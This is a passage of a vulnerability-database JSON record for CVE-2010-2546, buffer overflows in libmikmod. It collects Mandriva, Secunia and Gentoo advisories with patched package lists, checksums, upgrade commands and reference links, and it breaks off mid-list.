http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_powerpc.deb\n Size/MD5: 174950 ad1450f700117577ddede6fc3755d5da\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_sparc.deb\n Size/MD5: 260378 cd74bc83de2b60ed9cf4fc442e0352e1\n http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_sparc.deb\n Size/MD5: 152910 b684a3227432d45c220bb1378a4ed3d7\n\n\n\n. \n \n Packages for 2008.0 and 2009.0 are provided as of the Extended\n Maintenance Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149\u0026products_id=490\n \n The updated packages have been patched to correct this issue. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3995\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3996\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2546\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2971\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n 3239adc6a61914a960c8bb07ebab58d2 2008.0/i586/libmikmod2-3.1.11a-8.2mdv2008.0.i586.rpm\n 4a88081c44652b1abbb2168bad46fc17 2008.0/i586/libmikmod-devel-3.1.11a-8.2mdv2008.0.i586.rpm \n ecdb3414bb5ff4fde670f2983432fe92 2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 41d721fc0ade6181626d66527e08260f 2008.0/x86_64/lib64mikmod2-3.1.11a-8.2mdv2008.0.x86_64.rpm\n b9af3c6d02828c7c36f2d47275142a01 2008.0/x86_64/lib64mikmod-devel-3.1.11a-8.2mdv2008.0.x86_64.rpm \n ecdb3414bb5ff4fde670f2983432fe92 2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm\n\n Mandriva Linux 2009.0:\n 0c32865a362e5949549bd0597f1c3288 2009.0/i586/libmikmod3-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm\n 1f0c55a841c82430a4a455b9c0fd185f 2009.0/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm \n 3b736a5f6560c844e05d797772240ff8 2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n da510127c478758616146f2069b013ca 2009.0/x86_64/lib64mikmod3-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm\n ce57822efa45f0e36aa1d79f7cc75763 2009.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm \n 3b736a5f6560c844e05d797772240ff8 2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm\n\n Mandriva Linux 2009.1:\n 1987e95ad4486d0d70a5cb3f15462815 2009.1/i586/libmikmod3-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm\n 7c1d6e99214eca60d5e1b27d742557ac 2009.1/i586/libmikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm \n 2cf8f0a1794e134bad1f0510a4d4b255 2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm\n\n Mandriva Linux 2009.1/X86_64:\n 06d66faa37c282dbee789de65dc5b246 2009.1/x86_64/lib64mikmod3-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm\n 5940b272dda3c628bbf27799e43db079 2009.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm \n 2cf8f0a1794e134bad1f0510a4d4b255 2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm\n\n Mandriva Linux 2010.0:\n 754014cea8f3645395151dc2b7a4cc58 2010.0/i586/libmikmod3-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm\n cd1e7fca287c53499d973478c7813a6f 2010.0/i586/libmikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm \n 9db426850551cd0d47d49dce62bddf29 2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm\n\n Mandriva Linux 2010.0/X86_64:\n 477871f309a92d2912811fb31fea0943 2010.0/x86_64/lib64mikmod3-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm\n 4c02e2863a04a2201233ce6f0822fbb5 2010.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm \n 9db426850551cd0d47d49dce62bddf29 2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm\n\n Mandriva Linux 2010.1:\n 5dc9e3bcb87870d04daaeea37c1c7c90 2010.1/i586/libmikmod3-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm\n 30fd5e1c50381c01c621c67f83e46c53 2010.1/i586/libmikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm \n a8e35035a0439a36aed7acb4c6cd8c66 2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm\n\n Mandriva Linux 2010.1/X86_64:\n c642403d884dcd4aef507757d7688b4a 2010.1/x86_64/lib64mikmod3-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm\n b64cda55aeb0450fea2ad3af07fece31 2010.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm \n a8e35035a0439a36aed7acb4c6cd8c66 2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm\n\n Mandriva Enterprise Server 5:\n 6798c40fffe0cec1532ed4ea2470b041 mes5/i586/libmikmod3-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm\n 2b4f452bcfcd7ccbc1f9eea217b3e8ed mes5/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm \n 18ee204b5ffc212d4fb027b912a75c0b mes5/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdvmes5.1.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 5e4fb9c93420186fc60c96e38b9ea412 mes5/x86_64/lib64mikmod3-3.2.0-0.beta2.2.2mdvmes5.1.x86_64.rpm\n e285e5b3413fe8f0de6b71caa903c8f9 mes5/x86_64/lib64mikmod-devel-3.2.0-0.beta2.2.2mdvmes5.1.x86_64.rpm \n 18ee204b5ffc212d4fb027b912a75c0b mes5/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdvmes5.1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFMaOgMmqjQ0CJFipgRAt6nAKCzxX60CsvAUagtg/MS8MzgHh/84wCfbLXV\navaniwZZDpjBYi8uoj21mkM=\n=KovP\n-----END PGP SIGNATURE-----\n. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nGentoo update for libmikmod\n\nSECUNIA ADVISORY ID:\nSA48244\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48244/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48244\n\nRELEASE DATE:\n2012-03-06\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48244/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48244/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48244\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nGentoo has issued an update for libmikmod. This fixes two\nvulnerabilities, which can be exploited by malicious people to\npotentially compromise a vulnerable system. \n\nORIGINAL ADVISORY:\nGLSA 201203-10:\nhttp://www.gentoo.org/security/en/glsa/glsa-201203-10.xml\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201203-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libmikmod: User-assisted execution of arbitrary code\n Date: March 06, 2012\n Bugs: #335892\n ID: 201203-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple buffer overflow vulnerabilities in libmikmod may allow an\nattacker to execute arbitrary code or cause a Denial of Service\ncondition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libmikmod 3.2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=media-libs/libmikmod-3.2.0_beta2-r3\"\n\nAll libmikmod 3.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libmikmod-3.1.12-r1\"=\n\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying some of these\npackages. \n\nReferences\n==========\n\n[ 1 ] CVE-2010-2546\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2546\n[ 2 ] CVE-2010-2971\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2971\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201203-10.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"db": "BID",
"id": "41917"
},
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "92341"
},
{
"db": "PACKETSTORM",
"id": "92275"
},
{
"db": "PACKETSTORM",
"id": "94351"
},
{
"db": "PACKETSTORM",
"id": "92799"
},
{
"db": "PACKETSTORM",
"id": "110473"
},
{
"db": "PACKETSTORM",
"id": "110480"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-2546",
"trust": 3.3
},
{
"db": "BID",
"id": "41917",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "40799",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "48244",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1957",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1421",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576",
"trust": 0.8
},
{
"db": "IVD",
"id": "0D29F8FC-1FB3-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "92341",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94351",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92799",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110473",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110480",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"db": "BID",
"id": "41917"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "PACKETSTORM",
"id": "92341"
},
{
"db": "PACKETSTORM",
"id": "92275"
},
{
"db": "PACKETSTORM",
"id": "94351"
},
{
"db": "PACKETSTORM",
"id": "92799"
},
{
"db": "PACKETSTORM",
"id": "110473"
},
{
"db": "PACKETSTORM",
"id": "110480"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"id": "VAR-201008-0230",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
}
]
},
"last_update_date": "2023-12-18T11:51:31.410000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "libmikmod",
"trust": 0.8,
"url": "http://sourceforge.net/projects/mikmod/"
},
{
"title": "CVE-2009-3995f",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=39950"
},
{
"title": "mikmod-CVE-2009-3995-alt",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=39951"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://sourceforge.net/tracker/?func=detail\u0026aid=3033086\u0026group_id=40531\u0026atid=428227"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-201203-10.xml"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/40799"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/48244"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2010/dsa-2081"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:151"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/41917"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2010/1957"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=614643"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2546"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-2546"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=614643#c11http"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2546"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=614643#c11"
},
{
"trust": 0.3,
"url": "http://sourceforge.net/projects/mikmod/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2971"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3996"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3995"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6.0.1+lenny1.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6.0.1+lenny1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_s390.deb"
},
{
"trust": 0.1,
"url": "http://packages.debian.org/\u003cpkg\u003e"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6.0.1+lenny1_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6.0.1+lenny1_alpha.deb"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40799/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40799"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40799/"
},
{
"trust": 0.1,
"url": "http://secunia.com/gfx/pdf/secunia_half_year_report_2010.pdf"
},
{
"trust": 0.1,
"url": "http://lists.debian.org/debian-security-announce/2010/msg00126.html"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu4.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.9.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu4.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod_3.1.11-6ubuntu3.8.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_sparc.deb"
},
{
"trust": 0.1,
